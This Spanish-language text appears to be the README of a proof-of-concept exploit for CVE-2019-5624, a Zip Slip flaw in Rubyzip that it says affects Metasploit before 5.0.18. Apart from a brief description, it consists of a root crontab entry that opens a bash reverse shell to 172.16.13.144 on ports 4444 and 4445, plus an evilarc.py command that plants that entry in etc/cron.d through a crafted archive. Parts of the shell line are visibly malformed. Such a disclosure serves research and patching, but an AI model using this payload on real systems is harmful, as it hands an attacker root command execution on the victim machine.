
Una prueba de concepto para la vulnerabilidad CVE-2019-5624 de Metasploit (manejo inseguro de ZIP en Rubyzip que permite ejecución remota de código).
Una prueba de concepto para la vulnerabilidad CVE-2019-5624 de Metasploit (manejo inseguro de ZIP en Rubyzip que deriva en ejecución remota de código, RCE)
En febrero de 2019 encontré una nueva vulnerabilidad en la librería Rubyzip. Permite a un atacante explotar el manejo inseguro de archivos ZIP (Zip Slip) que resulta en la ejecución remota de comandos.
Esta vulnerabilidad se utilizó para atacar todas las versiones de Metasploit < 5.0.18 Metasploit Wrap-Up
He escrito una entrada de blog detallada que explica esta vulnerabilidad.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/